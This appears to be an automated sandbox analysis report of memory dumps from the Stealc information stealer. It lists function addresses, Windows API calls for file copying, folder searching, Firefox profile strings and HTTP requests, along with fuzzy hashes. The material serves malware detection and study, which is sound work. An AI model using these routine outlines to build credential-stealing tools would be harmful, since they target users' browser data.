Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 37c50efd23cddfd0a8dd9fb466988d7224bc2e39a75c8932a0bab4c539bb7363
Instruction ID: 4b3c4d64186b1bf317e0655ed727d8dc7cb41429e8e31a0ed95cc60fa1deda96
Opcode Fuzzy Hash: 37c50efd23cddfd0a8dd9fb466988d7224bc2e39a75c8932a0bab4c539bb7363
Instruction Fuzzy Hash: 1EE103728101289BDB19FBA4EC92EEE7338BF54300F508169F51776091EF386A49DB72

Function 00F1D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F28B60: GetSystemTime.KERNEL32(?,01774AC0,00F305AE,?,?,?,?,?,?,?,?,?,00F14963,?,00000014), ref: 00F28B86

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1D801
lstrlenA.KERNEL32(00000000), ref: 00F1D99F
lstrlenA.KERNEL32(00000000), ref: 00F1D9B3
DeleteFileA.KERNEL32(00000000), ref: 00F1DA32

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: f88b86f6ffd015f9bccdfe58a209f3c71ee8d769107bec143a387ded308a9f21
Instruction ID: e13403c26a2948c3e59f888aff961ada562b3ed093d818e936ef05cd4de228c3
Opcode Fuzzy Hash: f88b86f6ffd015f9bccdfe58a209f3c71ee8d769107bec143a387ded308a9f21
Instruction Fuzzy Hash: DB8134729101289BDB08FBA0FC92DEE7338BF54300F504528F517A7091EF386A49EB62

Function 00F1F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F199EC
Part of subcall function 00F199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F19A11
Part of subcall function 00F199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F19A31
Part of subcall function 00F199C0: ReadFile.KERNEL32(000000FF,?,00000000,00F202E7,00000000), ref: 00F19A5A
Part of subcall function 00F199C0: LocalFree.KERNEL32(00F202E7), ref: 00F19A90
Part of subcall function 00F199C0: CloseHandle.KERNEL32(000000FF), ref: 00F19A9A

Part of subcall function 00F28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28E52

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F31580,00F30D92), ref: 00F1F54C
lstrlenA.KERNEL32(00000000), ref: 00F1F56B

Strings

moz-extension+++, xrefs: 00F1F5AD
^userContextId=4294967295, xrefs: 00F1F59C

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 0412e4496e33323f886159f9da605e7641d15a4be9b94668c172512d31c85fcf
Instruction ID: 7606c9792b08b99f67c81a770b71b095d943f9b9f6646fe50ae9305247a14d37
Opcode Fuzzy Hash: 0412e4496e33323f886159f9da605e7641d15a4be9b94668c172512d31c85fcf
Instruction Fuzzy Hash: D1512571D10118ABDB04FBB4FC96DED7378AF54300F408528F81667192EF386A59EBA2

Function 00F24F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00F28E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00F24F7A
lstrcatA.KERNEL32(?,00F31070), ref: 00F24F97
lstrcatA.KERNEL32(?,0177DF18), ref: 00F24FAB
lstrcatA.KERNEL32(?,00F31074), ref: 00F24FBD

Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F2492C
Part of subcall function 00F24910: FindFirstFileA.KERNEL32(?,?), ref: 00F24943

Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F30FDC), ref: 00F24971
Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F30FE0), ref: 00F24987
Part of subcall function 00F24910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F24B7D
Part of subcall function 00F24910: FindClose.KERNEL32(000000FF), ref: 00F24B92

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 17a284b1c00e58f2c4b2f541861a5817227babb500d6b76d141522feaa8905f0
Instruction ID: 36e4e1c667cdc49bfbac9c0f07657812a0641ba7eeb0e5b6d10f4e668990f5d8
Opcode Fuzzy Hash: 17a284b1c00e58f2c4b2f541861a5817227babb500d6b76d141522feaa8905f0
Instruction Fuzzy Hash: 4521D6B6940308A7C768FBA0FC46EED373CAB54300F004654B66993085EE789AC99F92

Function 00F26AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,017703D0,?,00F3110C,?,00000000,?,00F31110,?,00000000,00F30AEF), ref: 00F26ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F26AE8
CloseHandle.KERNEL32(00000000), ref: 00F26AF9
Sleep.KERNEL32(00001770), ref: 00F26B04
CloseHandle.KERNEL32(?,00000000,?,017703D0,?,00F3110C,?,00000000,?,00F31110,?,00000000,00F30AEF), ref: 00F26B1A
ExitProcess.KERNEL32 ref: 00F26B22

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 8af72be35e0f0e38ad895a8109e9ffd66b63e008dfda06c432054f7d05dd88dd
Instruction ID: f1da9123f6b23879af9359e443e2f8d3f05889e0dfcf9fac7be387ad26eb194f
Opcode Fuzzy Hash: 8af72be35e0f0e38ad895a8109e9ffd66b63e008dfda06c432054f7d05dd88dd
Instruction Fuzzy Hash: 8DF05E30980329EBE720ABA0FC16BBD7B34EF54701F104624B523E21C5CBB95580FB65

Function 00F251F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F16280: InternetOpenA.WININET(00F30DFE,00000001,00000000,00000000,00000000), ref: 00F162E1
Part of subcall function 00F16280: StrCmpCA.SHLWAPI(?,0177E098), ref: 00F16303
Part of subcall function 00F16280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16335
Part of subcall function 00F16280: HttpOpenRequestA.WININET(00000000,GET,?,01781C78,00000000,00000000,00400100,00000000), ref: 00F16385
Part of subcall function 00F16280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F163BF
Part of subcall function 00F16280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F163D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25228

Strings

ERROR, xrefs: 00F25273
ERROR, xrefs: 00F2521A

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: d89b1b5708fdba7f98f60b7133533f0e1b92ac4ee507e6751665cd5ea95924f9
Instruction ID: a974bbe1614d60087009e3eeaf4c8bccbe1dc5b2b07e3703b17a2508465d431c
Opcode Fuzzy Hash: d89b1b5708fdba7f98f60b7133533f0e1b92ac4ee507e6751665cd5ea95924f9
Instruction Fuzzy Hash: BD110070910158EBCB18FF64ED52AED7378AF50300F404158F91A5B5D2EF38AB55EA92

Function 00F20740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0177DFD8), ref: 00F2079A
StrCmpCA.SHLWAPI(00000000,0177DF38), ref: 00F20866
StrCmpCA.SHLWAPI(00000000,0177DF28), ref: 00F2099D

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e67c50968edfe2222032780a94d351d9d817dba43abd686baee82af5f76c1f17
Instruction ID: 49a88b92cfe56acd4e283801a3dc1b5356ce264c5fa6374c15ac4a6479c6b47b
Opcode Fuzzy Hash: e67c50968edfe2222032780a94d351d9d817dba43abd686baee82af5f76c1f17
Instruction Fuzzy Hash: 22917875A10208DFCB28EF64DD92BED77B5FF94300F408529E8098F246EB349A45DB92

Function 00F20765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0177DFD8), ref: 00F2079A
StrCmpCA.SHLWAPI(00000000,0177DF38), ref: 00F20866
StrCmpCA.SHLWAPI(00000000,0177DF28), ref: 00F2099D

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 2f1227557050ad8d1dd2e858a0196908fbfa7d33bb2a9eec8d6ca8030d9874f3
Instruction ID: 169655c7e15c440451b492a5da964725c8012dd9f3084dcfc0ba61d946722f27
Opcode Fuzzy Hash: 2f1227557050ad8d1dd2e858a0196908fbfa7d33bb2a9eec8d6ca8030d9874f3
Instruction Fuzzy Hash: 42815775B10208DFCB28EF64DD91AEDB7B5FF94300F508529E8099F246DB34AA05DB82

Function 6BF53060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6BF53095

Part of subcall function 6BF535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6BFDF688,00001000), ref: 6BF535D5
Part of subcall function 6BF535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BF535E0
